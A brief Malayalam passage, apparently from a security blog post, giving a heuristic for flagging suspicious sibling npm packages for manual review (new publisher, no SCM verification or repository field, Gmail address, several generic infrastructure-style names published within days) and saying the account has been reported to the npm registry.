സ്ഥിരീകരിക്കുന്നതിന് മുമ്പ് അടുത്ത സഹോദര പാക്കേജ് കണ്ടെത്തുന്നതിന് ഒരു മൂന്നാം ഹ്യൂറിസ്റ്റിക് ഉപയോഗപ്രദമാണ്: ഒരു പുതിയ npm പ്രസാധകൻ, ഇല്ല SCM വെരിഫിക്കേഷൻ, ഒരു ജിമെയിൽ ഇമെയിൽ, ഇല്ല repository ഫീൽഡ്, ഒന്നിലധികം ഹ്രസ്വവും, പൊതുവായതും, അടിസ്ഥാന സൗകര്യങ്ങളെ പിന്തുണയ്ക്കുന്നതുമായ പാക്കേജ് നാമങ്ങൾ ദിവസങ്ങൾക്കുള്ളിൽ പ്രസിദ്ധീകരിക്കുന്നത്, സ്വമേധയാലുള്ള അവലോകനം ഉറപ്പാക്കാൻ പര്യാപ്തമാണ്.
npm രജിസ്ട്രിയിൽ റിപ്പോർട്ട് ചെയ്തു. പ്രസാധക അക്കൗണ്ട് നീക്കം ചെയ്യുമ്പോൾ ഞങ്ങൾ ഈ പോസ്റ്റ് അപ്ഡേറ്റ് ചെയ്യും.






